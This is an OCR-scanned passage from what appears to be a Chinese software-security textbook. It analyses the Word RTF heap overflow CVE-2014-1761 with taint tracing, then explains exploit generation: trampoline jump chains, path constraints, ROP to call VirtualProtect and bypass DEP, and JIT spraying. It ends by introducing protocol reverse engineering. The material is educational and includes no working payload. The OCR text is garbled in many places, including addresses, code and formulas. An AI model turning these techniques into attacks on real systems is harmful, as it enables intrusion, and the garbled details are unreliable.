对 Microsoft Word 软件 , Word 在 解析 畸形 的 RTE 格式 数据 时 存在 错误 导致 内 存 破 坏 ， 
使 得 攻击 者 能 够 执行 任意 代码 。 当 用 户 使 用 受 影响 的 Word 版 本 打开 恶意 RTF 文件 ,或 
者 Word 是 Outlook 的 Email Viewer 时 ,用 户 预 览 或 打开 恶意 的 RTF 邮件 信息 ,攻击 者 
都 可 能 成 功利 用 此 漏洞 ,从 而 获得 当前 用 户 的 权限 。 该 漏洞 能 够 影响 Word 2003 到 
Word 2013 的 各 个 版 本 。 

引发 该 漏洞 的 根本 原因 在 于 RTF 控制 字 overridetable, 一 个 overridetable 结构 可 
能 包括 listoverride.listoverridecount 和 lfolevel 域 ,其 中 listoverridecount 表明 结构 所 包 
AH lfolevel 的 数目 。 漏 洞 样本 使 用 listoverridecount 声称 有 25 个 lfolevel 结构 ,而 实际 
在 文件 中 置信 了 34 个 lfolevel 结构 ,分 配 结构 空间 时 只 分 配 了 25 个 ,而 解析 文件 是 逐个 
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结构 读 取 解析 ,并 未 检查 超出 分 配 的 结构 数量 ,导致 堆 溢 出 。 


在 现 有 的 分 析 中 ,通常 需要 大 量 的 手工 调试 操作 。 本 节 使 用 污点 传播 分 析 方法 , 跳 过 烦 
琐 的 测试 和 分 析 过 程 ,直接 跟踪 进入 漏洞 的 核心 。 我 们 使 用 Windows 7 环境 下 的 Office 
2010 对 CVE-2014-1761 的 poc 进行 分 析 , 在 污点 传播 系统 中 标记 该 文件 为 污点 , 当 文件 被 程 
序 读 取 后 ,动态 污点 传播 分 析 引擎 开始 分 析 程 序 对 文件 的 处 理 过 程 。 分 析 发 现 程 序 载 入 样 
本 后 在 0x275c01bl 位 置 的 call Lecxj 触 发 崩溃 ,Lecxj] 指 向 的 内 存 值 为 0x5959, 受 到 污点 源 控 
制 , 并 且 得 到 控制 字 节 来 自 于 文件 偏 移 0xlcd6 位 置 之 后 的 5 个 字 节 ,内 容 为 22873, 刚 好 是 
0x5959 的 十 进 制 表示 ,传播 过 程 如 图 9-10 所 示 ,图 中 将 关键 点 放大 显示 。 


“TaintEip": "Data Taint [ 159964394 ] 6x275celbl call dword [ecx] || [exlcd6 exlcd7 exlcd8 exlcd9 exlcda ] 


文件 含 移 0x1cd6 位 置 的 字符 申 据 ”22873 ” 
58577471]0x7855b36a rep movsd [[0x1260f0] 0x6c6f666c 0x32326563] 











58577471)0x7855b36a rep movsd [[0x1260f4] 0x6c657665 0x5c333738] 











1 [1587517951 0x7855b36a rep movsd [0x8c80130] 0x6d0073 0x5959] [[0x8cd8114] 0x5959 0x5959] 












func, 275c03c2|(] 159964384 


1| [159964394] 0x275c01b1 call dword [ecx] [(0x8c80130] 0x5959 0x5959] [0x0] 0x0 0x0] |: 


图 9-10 劫持 点 传播 路 径 


通过 对 崩溃 点 的 可 控 性 分 析 验 证 了 漏洞 的 可 利用 性 ,但 并 未 给 出 漏洞 的 攻击 利用 经 
过 。 另 外 ,通过 污点 分 析 监 测 到 第 一 个 控制 流 劫持 点 0x316feld3 call [ecx 十 0x4] ,在 
call [ecxj 之 前 ,此 处 调用 的 函数 已 被 支持 ,如 图 9-11 所 示 , 函 数 表 指针 ecx 被 算 改 ,发 生 
改变 , 跳 转 到 另 一 个 位 置 。 


EIP 指令 OP[0] 


图 9-11 破坏 前 后 对 比 图 


但 是 ecx 并 未 被 污点 输入 所 控制 ,对 ecx 逆向 切片 分 析 得 到 ecx 的 破坏 过 程 ,其 中 关 
键 代码 如 图 9-12 所 示 ,0x31d0cc6d 附近 的 代码 如 图 9-13 所 示 , 是 解析 lfolevel 结构 的 代 
码 , 因 未 检测 结构 数量 ,只 是 简单 地 通过 inc edi 处 理 下 一 个 结果 ,造成 memmove 溢出 , 破 
坏 了 其 他 结构 的 内 存 。 
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«call level="6" label = "59754505 QOx3lcfb5f3 call 0x31d6c0d8 []" esp="9x122dac"> 

«call levelz"7" label = "59754677 G0x31d6cc6d call 0x316db078 []" esp-"Oxlldbb4"» 

«call level-"8" label = "59754689 G0x316db091 call 0x7855b310 [MSVCR90.dll! memmove]" esp-"0xlldb98"» 
«record id-"59754711" label = "0x7855b460 mov eax, [esi«ecx*4-0x8] [[0x0] 0x8cd853c 0x8c80150] [[Ox8cd 
«record id-"59754712" label = "0x7855b464 mov [edi«ecx*4-0x8], eax [[0x1e7d7e0] 0x392cd468 0x8c80150] 
«ret id-"59754723" addr-"0x316db097" esp-"Oxlldb98 O0x11db98" temp k="9 8"/» 


9-312 溢出 关键 位 置 








:31D8CC55 mou eax, [ebx] 

:31D8CC57 lea esi, [eax*853Ch] 

:31D8CC5D mou edi, [esi] 

:31D8CC5F mo e e AECH 

:31D8CC68 in edi 

:31D6CC69 | push 8 isize| 
:91D0CCóB mou [esi], edi 

:31D9CC6D call MoveData 316DB878 

:31D8CC72 jnp loc 31D8C1C5 ; jumptable 31D8(| 








图 9-13  Ifolevel 结构 处 理 代码 


9.3 软件 漏洞 利用 


验证 软件 漏洞 危害 的 最 好 途径 就 是 实现 漏洞 利用 ,生成 攻击 代码 。 目 前 针对 漏洞 利 
用 自动 生成 也 是 国际 研究 的 热点 之 一 ,已 经 有 部 分 研究 成 果 形 成 ,典型 的 成 果 系统 包括 
AEGI9 „Poly AEG"? .MAYHEMI9 等 ,文献 [9] 对 国内 外 相关 工作 进行 了 总 结 和 比较 ,此 
处 不 再 袭 述 。 

针对 控制 流 劫持 漏洞 的 利用 ,从 漏洞 攻击 所 需要 素 的 角度 分 析 , 主 要 包括 以 下 3 个 关 
键 要 素 : 能 够 成 功 触发 漏洞 脆弱 点 并 在 内 存 中 展开 攻击 代码 的 输入 数据 ,能 够 将 控制 流 
转移 至 攻击 代码 的 完整 攻击 链 ,能 够 绕 过 操作 系统 保护 机 制 的 攻击 代码 。 本 节 将 论述 漏 
洞 利用 生成 所 需 的 关键 要 素 ,要素 的 提取 方法 ,以 及 基于 这 些 要 素 的 利用 代码 生成 方法 。 


934 漏洞 攻击 链 构造 


漏洞 攻击 链 构造 的 目标 是 在 内 存 中 找到 能 够 放置 控制 流转 移 代 码 的 空间 ,在 放 入 控 
制 流转 移 代 码 后 ,使 得 被 劫持 的 控制 流 能 够 顺利 转移 到 ShellCode。 漏 洞 攻击 链 构造 需要 
确定 两 方面 的 内 容 , 其 一 为 内 存 中 可 利用 的 区 域 , 其 二 为 区 域 之 间 的 控制 流转 移 关 系 。 如 
何 确定 内 存 中 可 利用 的 区 域 , 已 经 在 漏洞 分 析 阶 段 的 漏洞 内 存 布 局 部 分 (9. 2. 3 节 ) 进 行 
了 论述 。 在 本 节 , 把 条 件 简化 为 已 经 找到 了 部 分 连续 的 污点 内 存 ,并 且 污点 数据 由 输入 数 
据 直 接 映 射 得 到 ,此 时 相当 于 内 存 中 可 利用 的 区 域 已 经 完全 确定 ,因此 本 节 重 点 论述 区 域 
之 间 的 控制 流转 移 关系 构造 。 

控制 流转 移 关系 构造 的 首要 问题 是 使 控制 流 由 支持 点 转向 攻击 链 , 为 了 使 得 漏洞 攻 
击 在 每 次 实施 时 都 能 够 以 较 高 的 几率 达到 这 一 目标 ,通常 采用 两 种 办 法 。 第 一 种 是 内 存 
喷射 ,如 图 9-14(a) 所 示 ,通过 在 内 存 中 喷射 足够 多 的 重复 代码 ,使 得 喷射 的 内 存 范围 足以 
覆盖 被 劫持 控制 流 的 目标 ,这 样 ,在 程序 运行 时 能 保证 以 很 大 的 概率 接管 程序 。 这 种 方法 
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要 成 功 实现 ,需要 程序 自身 包含 动态 代码 的 功能 ,或 者 包含 支持 动态 分 配 内 存 的 模块 。 例 
如 ,浏览 器 程序 包含 了 JavaScript 模块 ,通过 它 可 以 动态 地 分 配 大 量 内 存 。 然 而 ,其 他 软 
件 可 能 不 包含 任何 JavaScript 或 动态 生成 代码 的 功能 模块 ,同时 程序 自身 也 不 包含 大 量 
生成 内 存 的 代码 多 辑 , 无 法 实现 内 存 喷 射 ,例如 播放 器 软件 。 
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图 9-14 ”漏洞 攻击 链 构造 思路 


第 二 种 方法 是 通过 已 知 地 址 的 跳板 指令 来 接管 程序 执行 ,如 图 9-14(b) 所 示 。 与 第 
一 种 方法 不 同 的 是 ,此 种 方法 不 需要 程序 自身 必须 具备 特定 的 功能 或 模块 ,具有 更 好 的 适 
用 性 。 对 于 这 种 指令 ,可 以 在 未 被 随机 化 的 模块 中 寻找 ,找到 的 指令 在 程序 每 次 运行 时 都 
会 在 固定 的 位 置 。 然 而 ,程序 所 依赖 的 模块 可 能 都 已 经 被 随机 化 处 理 。 这 种 情况 下 ,如果 
有 关键 的 信息 泄露 ,例如 某 个 模块 基地 址 ,那么 可 以 利用 被 泄露 的 信息 定位 所 有 模块 , 寻 
找 可 用 的 跳板 指令 以 构造 跳 转 链 。 

本 节 使 用 跳板 指令 来 构造 攻击 链 , 通 过 构造 不 同 的 指令 内 容 , 产 生 多 样 性 的 控制 流转 
移 方式 ,使 得 利用 模式 多 样 化 。 本 书 采 用 如 下 3 种 模式 的 跳板 指令 来 构造 跳 转 链 。 

1. call/jmp register 指令 

对 于 此 种 跳板 指令 而 言 ,寄存 器 是 唯一 的 参数 。Intel 的 通用 寄存 器 包括 eax、ebx 等 
8 个 ,这 些 寄存 器 均 可 以 用 于 call/jmp 的 跳板 指令 。 因 此 ,对 于 此 种 模式 ,可 以 获得 16 种 
跳板 指令 。 

2. call/jmp [register 十 offsetj] 

此 种 跳板 指令 ,唯一 的 间接 内 存 操作 数 由 8 种 通用 寄存 器 register 和 一 个 偏 移 offset 
来 决定 ,其 中 offset 偏 移 值 可 以 任意 选取 。 本 节 将 offset 取 值 范围 设 定 为 一 256 一 256 ,这 
样 就 能 够 构造 8192 种 跳板 指令 。 

3. 连续 指令 序列 

此 种 跳板 指令 指 中 ,每 一 个 跳板 指令 由 进程 代码 区 域 中 的 地 址 连续 的 多 条 指令 构成 。 
它们 完成 的 工作 和 一 条 跳板 指令 相同 (例如 常用 在 SEH 漏洞 利用 中 的 pop. pop ret, Ài t hY 
pop 指令 用 于 调节 堆栈 指针 ,最 后 一 条 ret 指令 用 于 转移 控制 流 ), 所 以 将 它们 看 作 一 条 跳板 
指令 。 在 实际 应 用 中 ,此 类 指令 数目 和 种 类 可 以 根据 实际 漏洞 利用 生成 的 需要 进行 扩展 。 
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由 于 自然 语言 的 描述 很 容易 混淆 ,此 处 引入 符号 化 的 定义 对 问题 进行 说 明 。 把 内 存 
中 由 直接 污点 映射 形成 的 数据 块 记 为 block, 起 始 地 址 为 block. start, 结 束 地 址 为 block 
.end; 跳 板 指令 记 为 1 该 指令 执行 后 转移 到 的 目标 地 址 记 为 I target。 通 过 前 面 讨论 可 
知 , 仅 当 指令 的 跳 转 目标 I target 能 够 落 在 某 一 个 block 内 时 (block. start I. target < 
block. end) ,I 才能 作为 构造 跳 转 链 的 候选 指令 。 把 指令 I 实施 控制 流转 移 后 的 目标 块 记 
为 I block。 之 后 ,可 以 搜索 进程 发 生 崩 溃 后 的 内 存 布局 ,获得 所 有 跳板 指令 的 候选 集合 
Cand, Cand= (I | block. target<I. target < block. end. block€ B } ,其 中 B 为 所 有 可 由 
污点 控制 的 内 存 块 。 

搜索 过 程 可 以 分 为 如 下 的 步骤 : 搜索 出 所 有 在 内 存 中 通过 直接 映射 的 block( 搜 索 方 
法 在 9.2.3 节 的 软件 漏洞 内 存 布局 分 析 中 已 经 论述 ); 分 析 每 一 个 block 的 长 度 , 判 定 
block 的 长 度 能 否 放 入 跳 转 代码 ;根据 block 之 间 的 偏 移 和 跳板 指令 的 控制 流转 移 范围 构 
建 跳 转 链 。 

将 跳 转 链 记 为 JumpChain , 跳 转 链 包括 一 系列 在 block 中 放置 的 指令 JumpChain = 
{b> hs S L.lmam|Candl). KP IE Cand, 3E E lj. Eb... ŻAHRA. dn 
图 9-15 所 示 , 图 中 虚线 表示 控制 流转 移 方向 ,其 中 I addr 表示 I 在 漏洞 程序 进程 空间 中 
所 在 的 内 存 地 址 ,I. code 表示 I 的 操作 码 。 预 期 能 够 找到 如 图 所 示 的 攻击 链 ,其 中 控制 流 
支持 点 被 覆盖 了 第 一 个 跳板 指令 To 的 地 址 (通常 情况 下 ,控制 流动 持 点 转移 到 的 第 一 个 
跳板 地 址 To. addr 应 当 在 进程 加 载 的 某 个 非 随机 化 模块 代码 段 范围 之 内 ) ,之 后 的 跳板 指 
令 依 次 指向 下 一 个 block 中 的 跳板 指令 ,直到 控制 流转 移 到 shellcode。 





一 ~、 lo .target 一 一 ~ I target 一. 
VA 一 ~ "d 5 Bs ~ f ^ we S 
"4 
ly.addr |l, -block| I, .block ds 
控制 流动 持 点 T, 的 代码 L 的 代码 block, 




















图 9-15 跳 转 链 示意 图 


根据 block 的 大 小 、 地 址 不 同 , 可 在 block 中 放 入 不 同 的 代码 ,甚至 可 以 对 其 中 的 部 分 
代码 进行 混淆 或 加 密 、 解 密 操作 ,进而 形成 不 同 的 攻击 链 , 使 得 最 终生 成 的 漏洞 利用 多 
样 化 。 


932 漏洞 攻击 路 径 触发 


漏洞 攻击 路 径 触发 是 漏洞 利用 中 较为 重要 的 一 环 ,最 终 利用 的 生成 是 通过 重 构 输 入 
的 方式 实现 的 ,其 目标 是 通过 构造 输入 数据 ,使 程序 能 够 执行 到 控制 流 劫持 点 。 由 于 脆弱 
路 径 的 触发 需要 满足 路 径 约束 , 即 重 构 过 程 中 对 部 分 输入 数据 的 取 值 需要 满足 一 定 的 约 
束 条 件 。 因 而 针对 漏洞 攻击 路 径 触 发 的 输入 数据 重 构 关键 在 于 : 提取 程序 执行 路 径 中 所 
有 与 输入 相关 的 条 件 分 支 ,根据 分 支 判 断 条 件 生成 相应 的 约束 条 件 表达 式 , 对 表达 式 进行 
综合 求解 ,确定 输入 数据 的 取 值 范围 。 

执行 路 径 中 与 程序 输入 相关 的 分 支 判断 条 件 称 为 污点 分 支 判断 条 件 , 这 些 分 支 判 断 
条 件 具 有 两 个 特点 。 在 每 一 个 污点 分 支 判 断 条 件 处 ,定位 相关 的 程序 输入 字 节 ,生成 对 应 
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的 约束 条 件 。 具 体 方法 是 在 污点 传播 图 (污点 传播 记录 形成 的 图 ) 中 寻找 污点 分 支 判 断 指 
令 节 点 ,以 此 节点 为 起 点 ,在 污点 传播 图 中 进行 回溯 .在 回溯 到 污点 源 节点 时 ,就 能 够 定 
位 所 有 相关 的 污点 字 节 以 及 通过 记录 回溯 过 程 得 到 的 污点 指令 序列 ,根据 指令 序列 可 生 
成 符号 化 的 路 径 约 束 条 件 。 为 了 得 到 最 终 的 符号 化 描述 ,将 所 有 与 污点 分 支 判 断 条 件 相 
关 的 程序 输入 字 节 赋予 一 个 符号 变量 ,根据 指令 语义 ,实例 化 符号 执行 污点 指令 序列 中 每 
一 条 指令 。 最 后 ,在 分 支 指令 处 ,根据 EFLAGS 寄存 器 中 对 应 标志 位 的 值 ,生成 反映 此 分 
支 执行 结 果 的 约束 表达 式 。 假 设 存在 如 下 的 代码 : 


if( File[offset (0x03)] !='D' || File[offset(0x04)] ! ="A" ){ 
exit(); 

) 

if( File[offset(0x30)] !='C' || File[offset(0x40)] ! ="E" )( 
exit(); 


) 
if( File[offset (0x80)] >15 ){ 
strcpy ( buffer, File[offset (0x100)] ); 
return; 
} 
根据 前 面 的 方法 可 知 , 最 终 得 到 的 路 径 约 束 为 : 偏 移 0x03 的 值 为 字符 D, 偏 移 0x04 
的 值 为 字符 A, 偏 移 0x30 的 值 为 字符 C, 偏 移 0x40 的 值 为 字符 EE, 偏 移 为 0x80 的 值 应 当 
大 于 15。 输 入 数据 的 取 值 范围 确定 后 ,还 需要 和 前 面 生成 的 攻击 链 进行 组 合 ,才能 够 形 
成 最 终 可 用 的 利用 样本 。 组 合 过 程 中 ,首先 应 当 放 置 跳板 指令 和 shellcode, 然 后 根据 路 
径 约 束 条 件 修正 输入 数据 中 特定 偏 移 的 取 值 , 此 时 可 能 会 出 现 攻击 链 和 取 值 范围 发 生 冲 
突 的 情况 ,针对 此 类 情况 ,可 以 预先 设 定 攻击 链 代 码 的 蔡 换 规则 ,手动 更 改 或 自动 替换 冲 
突 部 分 的 攻击 代码 即 可 。 
EAX 
call/jmp EAX | 支持 地 址 
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图 9-16 利用 构造 示意 图 


图 9-16 是 构造 攻击 链 和 产生 能 够 触发 漏洞 的 样本 的 主要 思路 。 本 书 采用 以 上 思路 
构造 了 一 个 自动 生成 利用 代码 的 引擎 ,但 生成 的 代码 尚 不 能 绕 过 DEP、ALSR 等 操作 系 
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统 防护 机 制 。 接 下 来 将 重点 论述 操作 系统 安全 防护 机 制 的 绕 过 方法 。 
933 保护 机 制 绕 过 


操作 系统 使 用 了 数据 执行 保护 、 堆 栈 Cookie, ASLR 等 技术 对 可 能 发 生 的 漏洞 攻击 进行 
了 保护 。 鉴 于 栈 溢出 类 漏洞 目前 已 经 很 少 , 当 前 操作 系统 主要 的 保护 机 制 集中 在 ASLR( 地 
址 空间 随机 化 ) 和 DEP( 数 据 执行 保护 )。 这 两 种 保护 方式 使 得 通过 履 盖 函数 返回 地 址 和 范 
数 指针 等 简单 的 利用 方式 很 难 奏效 。 要 生成 真正 能 够 使 用 的 利用 样本 ,必须 突破 这 两 类 防 
护 方式 ,目前 主要 采用 的 是 在 未 随机 化 的 模块 中 构造 ROP 链 的 方法 。 在 内 存 中 寻找 未 随机 
化 的 模块 可 通过 检测 PE 文件 头 中 的 IMAGE DLL. CHARACTERISTICS. DYNAMIC -. 
BASE 标识 实现 ,在 此 处 不 再 缆 述 。 接 下 来 ,本 节 对 ROP 技术 进行 简要 的 介绍 。 

ROP 利用 进程 空间 中 已 经 被 载 和 的 模块 搜寻 以 ret 指令 结尾 的 代码 片段 (gadget)， 
并 将 它们 部 署 在 内 存 中 形成 攻击 链 , 通 过 构造 程序 栈 中 的 数据 ,使 攻击 链 的 控制 流 按照 顺 
WR "E ERE ,执行 相应 的 gadget, 达 到 攻击 者 预 设 的 目标 。gadget 以 ret 指令 为 结尾 ,等 
ACT. POP 十 JUMP, 将 当前 栈 顶 指针 ESP 指向 的 值 弹出 ,然后 跳 转 到 该 值 所 代表 的 地 址 ， 
继续 执行 指令 ,攻击 者 通过 控制 ESP 指向 的 值 和 跳 转达 到 间接 控制 EIP 的 目的 。 攻 击 者 
可 以 通过 精心 构造 栈 空间 布局 达到 间接 控制 EIP 的 目的 。 

在 漏洞 攻击 中 ,ROP 主要 被 用 来 调用 API 来 关闭 或 绕 过 DEP, 较 为 常用 的 API 包括 
VirtualAlloc, SetProcessDEPPolicy , NtSetInformationProcess, VirtualProtect 等 。 为 了 
达到 该 目标 ,需要 完成 如 下 的 工作 : 首先 找到 一 系列 以 retn 指令 结尾 的 指令 ,分 析 指 令 的 
内 容 , 分 析 要 调用 函数 的 参数 ,把 每 一 个 gadget 要 设置 的 值 . 预 期 跳 转 到 的 地 址 写 到 栈 
中 ,这 样 每 执行 完 一 条 指令 之 后 就 会 接着 执行 下 一 条 指令 ,最 终 达 到 绕 过 DEP 的 目的 。 
为 了 介绍 的 方便 ,选择 VirtualProtect 函数 作为 调用 的 目标 ,修改 内 存 块 的 属性 为 
Executable, 进 而 绕 过 DEP 执行 shellcode。VirtualProtect 的 声明 如 下 : 


BOOL VirtualProtect{ 
LPVOID lpAddress, // 需 要 修改 属性 的 内 存 的 起 始 地 址 
DWORD dwSize, // 大 小 


DWORD flNewProtect, ”// 预 期 改 为 可 执行 可 读 写 PAGE EXECUTE READWRITE, 0x40 
PDWORD lpflOldProtect // 原 始 属 性 的 保存 地 址 


反 汇 编 VirtualProtect 可 以 得 到 如 下 的 代码 : 


MV EDI,EDI 
PUSH EBP 
MV EBP,ESP 


PUSH DWORD PTR SS: [EBP+ 14] ;设置 参数 lpfloldProtect 
PUSH DWORD PTR SS: [EBP+ 10] ;设置 参数 flNewProtect : 0x40 
PUSH DWORD PTR SS: [EBP+ C] ;设置 参数 dwsize 

PUSH DWORD PTR SS: [EBP+ 8] ;设置 参数 lpaddress 

PUSH =å 


CALL kernel32.VirtualProtectEx  ; 转 入 VirtualProtectEx() 
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POP EBP 
RETN 10 


由 以 上 反 汇 编 代码 可 知 ,只 要 在 Lebp 十 0x8] 到 [ebp 十 0x18] 的 区 域内 放置 好 各 种 参 


数 , 再 把 控制 流转 向 VirtualProtectEx 函数 的 地 址 ,就 可 以 关闭 DEP 了。 构造 的 内 存 布 
局 和 攻击 链 如 图 9-17 Bron o 





























高 1pflOldProtect ed ^ uie : 
D (erstens; et 
fINewProtect = hp-ipAddrea] 
BaseAddress 
[ebp*hProcess] ; ProcessHandle 
dwSize I Viera Pectus XXX); 
IpAddress 
任意 值 - 
低 ebp address 
b à 
hl gadget 地 址 1 PREE di 











图 9-17 ROP 构造 原理 


构造 ROP 攻击 链 的 典型 工具 是 Python 插件 Mona, 该 插件 能 够 自动 搜索 进程 中 可 
用 的 ROP 代码 片段 ,并 产生 候选 ROP 攻击 链 , 攻 击 者 仅 需 较 少 的 跳 转 , 便 可 以 生成 可 用 
的 利用 代码 ,这 大 大 减 小 了 攻击 成 本 ,使 得 此 种 攻击 技术 趋 于 自动 化 。 类 似 的 工具 还 包括 
ROPGadget 等 。 

目前 除 ROP 之 外 较为 新 颖 的 DEP 绕 过 方法 是 JIT Spraying, 通 过 JavaScript 或 者 
ActionScript 语言 来 控制 JIT 编译 器 的 行为 ,在 内 存 中 动态 产生 大 量 包 含 了 shellcode 的 
内 存 对 象 。 相 关 对 象 的 内 存 页 具有 可 执行 属性 ,不 受到 DEP 机 制 的 约束 。 攻 击 者 将 
shellcode 按照 特定 方式 编码 到 JavaScript 或 ActionScript 脚本 中 即 可 。 攻 击 者 不 需要 依 
赖 固定 加 载 地 址 的 模块 等 信息 ,而 是 尝试 在 攻击 过 程 中 根据 由 漏洞 导致 的 异常 控制 流 的 
目标 地 址 ,掌控 喷射 的 粒度 和 地 址 范围 ,使 得 在 异常 控制 流 能 够 以 高 概率 转移 到 某 个 
shellcode 以 达到 攻击 目标 。 

ROP 攻击 具有 较为 明显 的 特征 ,在 ROP 攻击 链 中 ,jmp 指令 在 不 同 的 库 函 数 甚至 不 
同 的 库 之 间 跳 转 ,攻击 者 抽取 的 指令 序列 并 不 一 定 是 一 个 正常 的 指令 起 始 位 置 ,该 特点 不 
同 于 正常 程序 的 执行 。 因 而 在 实际 工作 中 ,针对 ROP 的 检测 通常 采用 控制 流 完整 性 检验 
的 方式 实施 , 即 在 程序 运行 之 前 获取 正常 的 控制 流转 移 方向 ,在 运行 过 程 中 检测 ,发 现 非 
正常 的 控制 流转 移 位 置 则 中 止 程 序 运行 或 提示 漏洞 攻击 。 








9.4 小 结 


在 控制 流 劫持 类 漏洞 中 ,攻击 者 通过 修改 控制 流 相 关 的 数据 ,使 得 程序 中 控制 流 指令 
(例如 call jmp 和 ret) 的 操作 数 被 算 改 为 特定 的 代码 位 置 。 与 非 控制 流 劫持 类 漏洞 不 同 
的 是 ,攻击 者 还 需要 插入 一 段 shellcode, 在 指令 执行 之 后 ,程序 执行 权能 够 跳 转 至 
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shellcode 执行 。 

在 本 章 的 内 容 中 , 栈 溢 出 、 堆 溢出 漏洞 通常 都 是 由 于 没有 对 缓冲 区 访问 范围 进行 检 
查 , 导 致 读 写 操作 范围 超出 缓冲 区 ,造成 关键 控制 流 数 据 被 覆盖 。 栈 溢出 被 覆盖 的 数据 可 
能 是 函数 的 返回 地 址 或 者 栈 中 的 函数 指针 。 堆 溢出 覆盖 的 数据 可 能 是 后 续 堆 的 管理 结构 
或 者 虚 函 数 指针 等 。 指 针 访 问 漏洞 是 由 于 程序 的 内 存 、 对 象 申请 和 释放 的 时 序 发 生 错 误 ， 
使 得 某 些 指针 没有 指向 合法 的 内 容 , 在 对 这 些 指针 进行 操作 或 解 引 用 时 导致 访问 错误 。 
控制 流动 持 类 漏洞 的 关键 特征 在 于 产生 了 非法 的 控制 流转 移 ,针对 该 特征 目前 很 多 系统 
已 经 开始 引入 控制 流 完整 性 检验 (Control Flow Integrity,CFI) 进 行 防御 ,取得 了 良好 的 
效果 。 

根据 本 章 的 内 容 可 知 , 对 于 控制 流 劫持 类 漏洞 而 言 ,攻击 者 需要 自 改 控制 流 相关 的 数 
据 , 如 函数 返回 地 址 、 函 数 指针 等 ,这 类 控制 流 数据 在 程序 中 数量 较 多 ,所 以 在 漏洞 数量 
上 ,针对 控制 流动 持 类 漏洞 的 利用 攻击 较 针 对 非 控 制 流动 持 类 漏洞 的 利用 攻击 多 ,控制 流 
动 持 类 漏洞 也 更 为 攻击 者 广泛 利用 ,多 年 来 一 直 对 应 用 程序 和 系统 安全 构成 严重 的 威胁 ， 
随 着 攻击 手段 日 益 进 化 而 变 得 愈加 复杂 和 巧妙 ,可 以 预见 ,针对 此 类 漏洞 的 利用 攻击 仍 将 
在 很 长 一 段 时 间 内 威胁 信息 安全 。 

同时 ,要 使 非 控制 流 劫持 类 漏洞 利用 成 功 ,关键 是 需要 攻击 者 找到 能 够 影响 程序 执行 
路 径 的 关键 数据 ,并 根据 数据 的 内 容 影响 程序 执行 路 径 , 产 生 非 预期 的 操作 。 这 类 漏洞 难 
以 发 握 , 成 功利 用 难度 大 ,但 在 目前 操作 系统 保护 机 制 不 断 增强 ,控制 流 劫持 漏 洞 利用 难 
度 越 来 越 高 的 条 件 下 ,也 已 经 逐渐 成 为 了 研究 的 热点 。 
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网 络 协议 北向 分 析 


从 互联 网 诞生 之 日 起 ,网 络 协议 就 是 其 中 不 可 或 缺 的 关键 一 环 , 它 是 网 络 中 各 类 实体 
之 间 的 通信 纽带 。 互 联网 上 的 各 类 节点 (包括 通用 计算 机 、 网 络 设备 ,专用 工控 机 等 ) 之 间 
要 实现 信息 共享 和 任务 协作 ,必须 首先 约定 一 套 网 络 通信 规范 ,依照 该 规范 完成 节点 间 信 
息 交 互 和 执行 约定 的 任务 。 各 类 网 络 协议 的 实现 集成 到 软件 中 ,赋予 其 进行 联网 数据 传 
输 和 信息 共享 的 能 力 ,是 现代 软件 不 可 或 缺 的 重要 组 成 部 分 。 因 此 针对 网 络 协议 实现 的 
逆向 分 析 成 为 软件 安全 分 析 的 重要 领域 之 一 ,网 络 应 用 软件 的 广泛 使 用 也 对 网 络 协议 的 
逆向 分 析 技术 提出 了 更 高 的 要 求 , 工 业界 和 学 术 界 也 投入 到 协议 自动 化 逆向 方法 的 研究 
中 ,并 取得 了 大 量 成 果 。 

本 章 重 点 对 基于 软件 动态 分 析 的 网 络 协议 逆向 分 析 方法 进行 介绍 ,首先 对 网 络 协议 
和 网 络 协议 逆向 的 基本 概念 进行 介绍 ,然后 对 网 络 协议 消息 格式 逆向 方法 进行 详细 讲解 ， 
最 后 介绍 协议 状态 机 恢复 方法 。 


10.1 网 络 协 议 逆向 概述 


“协议 ”这 个 词 在 不 同 场合 有 不 尽 相同 的 含义 。 在 一 般 社交 场合 常用 来 表示 规范 、 礼 
仪 和 约定 等 含义 ,而 在 信息 领域 “协议 ”通常 用 来 指 网 络 协议 或 通信 协议 , 即 定义 计算 机 
和 电信 和 网络 中 数据 如 何 构 造 \ 传 输 和 处 理 的 一 系列 规范 和 准则 。 人 和 人 之 间 通 过 语言 进 
行 交流 ,而 计算 机 之 间 需 要 通过 网 络 协议 进行 交流 ,协议 是 互联 网 发 展 过程 中 的 重要 组 成 
部 分 。 为 了 将 尽 可 能 多 的 计算 机 纳入 互联 网 以 实现 全 球 信息 共享 ,国际 标准 化 组 织 制 定 
了 大 量 协议 ,如 国际 互联 网 工程 任务 组 (IETF)、 美 国电 气 电子 工程 师 学 会 (IEEE)、 万 维 
网 联盟 (W3C) 等 组 织 都 在 不 断 发 布 新 的 协议 规范 以 满足 互联 网 各 种 新 应 用 发 展 的 需求 。 

针对 具体 的 网 络 协 议 , 目 前 还 很 难 给 出 没有 歧义 的 严格 形式 化 描述 和 定义 ,即使 在 
RFCO 等 大 量 专家 修订 校正 过 的 网 络 协议 规范 文本 中 仍然 无 法 避免 不 同 背 景 的 信息 行业 
从 业 人 员 对 其 的 不 同 理解 。 

NIRE EWE S (Gerard J. Holzmann) 将 网 络 协议 中 划分 为 5 个 要 素 : 

CD 协议 提供 的 服务 , 即 协议 提供 给 用 户 的 功能 。 

(2) 协议 依赖 环境 和 条 件 等 , 即 协议 提供 服务 所 必需 的 基本 外 部 约束 、 条 件 等 。 

(3) 协议 的 消息 类 型 , 即 协议 交互 过 程 中 每 次 发 送 的 消息 的 功能 类 别 。 
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(4) 协议 的 消息 格式 和 组 成 方法 , 即 协议 消息 的 具体 组 织 和 构成 方式 。 

(5) 协议 状态 机 , 即 对 协议 中 消息 交换 过 程 进 行 约束 的 一 系列 规则 。 

例如 ,针对 FTP 协议 ,其 提供 的 服务 (要 素 1) 可 以 简单 描述 为 具备 用 户 身份 认证 功 
能 的 远程 文件 系统 服务 ,支持 文件 和 文件 夹 的 上 传 . 下 载 . 查 询 、 更 新 和 删除 等 。 FTP B 
议 基 于 提供 可 靠 信息 传输 服务 的 TCP 协议 (要 素 2) 构 建 。 协 议 的 消息 类 型 (要 素 3) 包 括 
请 求 和 回复 两 种 ,请求 类 型 包含 用 户 登录 ,用户 密码 `. 下 载 文件 .上 传 文件 等 几 十 个 类 型 ， 
回复 类 型 包含 失败 ,成 功 、 错 误 等 儿 十 种 具体 类 型 。FTP 协议 的 消息 格式 (要 素 4) 由 消息 
类 型 和 消息 内 容 组 成 ,这 两 部 分 由 空格 字符 分 隔 。FTP 协议 的 状态 转换 机 制 (要 素 5) 包 
括 多 用 户 登 录 机 制 、 命 令 请 求 和 相应 机 制 等 。 

网 络 协议 逆向 是 软件 逆向 方法 和 技术 在 网 络 协议 实现 上 的 具体 应 用 ,是 软件 逆向 领 
